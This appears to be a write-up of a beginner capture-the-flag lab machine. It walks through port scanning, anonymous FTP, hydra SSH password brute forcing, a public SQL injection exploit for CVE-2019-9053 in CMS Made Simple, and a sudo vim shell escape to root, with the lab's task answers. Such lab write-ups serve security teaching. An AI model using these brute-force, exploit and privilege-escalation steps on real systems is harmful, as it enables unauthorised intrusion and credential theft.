You can find the link here : https://tryhackme.com/room/easyctf
So let us begin the challenge :)
As always we need to enumerate the machine for open ports and find vulnerabilities in them so that we can exploit them and get access to the machine.
We can use a tool called Nmap for that. I have made a blog about Nmap which you can check here.
nmap -sV -T4 IP
-sV : Stands for service version detection
-T4 : Make the scan faster.
IP : IP address of the machine.
[aksheet@archlinux THM]$ nmap -sV -T4 IPStarting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 16:46 UTC
Nmap scan report for IP
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.380/tcp open http Apache httpd 2.4.18 ((Ubuntu))2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds
As we can see there are 3 ports open 21, 80 and 2222 running. Nmap also tells us that the OS running in it is Ubuntu.
21 running FTP service
80 running HTTP server
2222 running SSH
This Nmap scan reveals the answer for the first 2 tasks.
How many services are running under port 1000?
There was 21 and 80, so the answer would be2.What is running on the higher port?
2222 is the highest port open in here which is running the SSH service as shown in the scan, so the answer to this task would be SSH.
FootHold Technique 1
Now it is the time for enumerating these services. First let us check out the FTP service which is running on port 21. (I like going enumerate the ports in order).
The first thing I would try is if the ftp server will allow anonymous connection. Let us try that.
ftp IP and for the username enter anonymous
[aksheet@archlinux THM]$ ftp IPConnected to IP.
220 (vsFTPd 3.0.3)
Name (IP:aksheet): anonymous <- Enter this as the username
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Yes, anonymous login is enabled. Lets us try viewing the files in it with the ls -la command.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>There is a folder called as pub . Let us change our directory to pub via the cd pub command and view the files inside it with the ls -la command.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 .
drwxr-xr-x 3 ftp ftp 4096 Aug 17 2019 ..
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp>We can see a ForMitch file. We can view the contents for the file via the get ForMitch.txt - command.
ftp> get ForMitch.txt -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
If you read it, you can see that the text says that the person cracked the password. Does that mean we can use brute force to get the SSH password?
We can use a tool called hydra which will brute force SSH for us. We can see that the user is called Mitch. What if we use that as the username and crack the password for it.
hydra -l Mitch -P /path/to/rockyou.txt ssh://IP:2222
-l: Specify username-P: Specify a wordlist for passwordsssh://IP:2222: Specify which protocol to use, the IP and the custom port(As the port 2222 had SSH running instead of the default 22).
After a few seconds it will show us that it has cracked the password.
[aksheet@archlinux ~]$ hydra -l mitch -P rockyou.txt ssh://10.10.142.56:2222---
[DATA] attacking ssh://10.10.142.56:2222/
[2222][ssh] host: 10.10.142.56 login: mitch password: redacted
1 of 1 target successfully completed, 1 valid password found
---
This bruteforce gives us the answer for task number 5 and 6. (3 and 4 will be covered in the Foothold part 2)
5. What’s the password?
redacted6. Where can you login with the details obtained?
SSH
Now we can successfully login via the gained credentials in SSH.
[aksheet@archlinux ~]$ ssh mitch@IP -p2222
The authenticity of host '[IP]:2222 ([IP]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[IP]:2222' (ED25519) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage0 packages can be updated.
0 updates are security updates.$ whoami
mitch
FootHold Technique 2
Now enumerating the port 80.
Browsing to the default webpage we can see the default apache page
The first thing that came in my mind was directory busting. We can use a tool called dirsearch to do so.
dirsearch -i 403 -u IP -t 200
-u: Stands for the URLIP: IP Address for the machine-x: Exclude specific status codes (which can be more than 1 separated by comma, in this case 403)-t: Run threads (in this case 200)
[16:46:09] Starting:
[16:46:36] 200 - 11KB - /index.html
[16:46:46] 200 - 929B - /robots.txt
[16:50:49] 301 - 315B - /simple -> http://IP/simple/We find a directory called simple , let’s browse it.
We see a webpage which is made by CMS as shown on the top. Usually the version numbers are written on the bottom on the page.
Scrolling to the bottom of the page we DO find the version of the page which happens to be the 2.2.8
Now let’s search for a exploit for this specific version.
This first result was the one we needed as it is an exploit for CMS versions less than 2.2.10.
This will answer the task number 3 and task 4
3. What’s the CVE you’re using against the application?
cve-2019–9053
4. To what kind of vulnerability is the application vulnerable?
As the exploit says SQL injection which is also known as SQLi. So the answer for this task will be “SQLi”.
Let’s copy the exploit from the site and save it locally on your attacking machine as any name (I will use the name as ex.py)
python ex.py -u http://IP/simple
After 2 3 minutes we found the password.
$ python2 ex.py -u http://IP/simple --crack -w ~/Desktop/rockyou.txt[+] Salt for password found: Redacted
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: Redacted
[+] Password cracked: Redacted
This answers task number 5.
5. What’s the password?
Redacted
We can use the username and password to try login in FTP or SSH.
$ ftp IP
Connected to IP.
220 (vsFTPd 3.0.3)
Name (IP:kali): mitch
530 This FTP server is anonymous only.
Login failed.So it looks like FTP won’t work. Let’s try SSH.
$ ssh mitch@IP -p2222
Warning: Permanently added '[IP]:2222' (ECDSA) to the list of known hosts.
mitch@IP's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage0 packages can be updated.
0 updates are security updates.Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$
Yes, we could login in SSH via the obtained creds. This answers task number 6.
6. Where can you login with the details obtained?
SSH
We can find user.txt in the home directory of the user mitch, we can view it’s contents using cat user.txt.
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
RedactedThis answers our task number 7
7. What’s the user flag?
Redacted
To answer the 8th question we have to browse in the /home directory and list the folders in there using ls.
$ cd /home
$ ls
mitch sunbathAs we can see there are 2 users namely mitch and sunbath.
8. Is there any other user in the home directory? What’s its name?
sunbath
Path To Root
The first thing I do to check for privilege escalation is the sudo rights of the user. You can find out by doing the sudo -l command.
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vimsudo -l shows us that we can run vim as sudo to get root.
This answers the task number 9.
9. What can you leverage to spawn a privileged shell?
vim
We can go to GTFOBins to see the way to escape vim and get root.
Click on Sudo
Let’s run the first command sudo vim -c ':!/bin/sh'
-c: Specifies to run the command, in this case/bin/sh
$ sudo vim -c ':!/bin/sh'# whoami
root
#
Wohoo!!! We are root. We can get the root flag stored in /root
# cd /root
# ls
root.txt
# cat root.txt
RedactedThis answers the last task
10. What’s the root flag?
Redacted
Thank you for reading my writeup. Hope you enjoyed it.
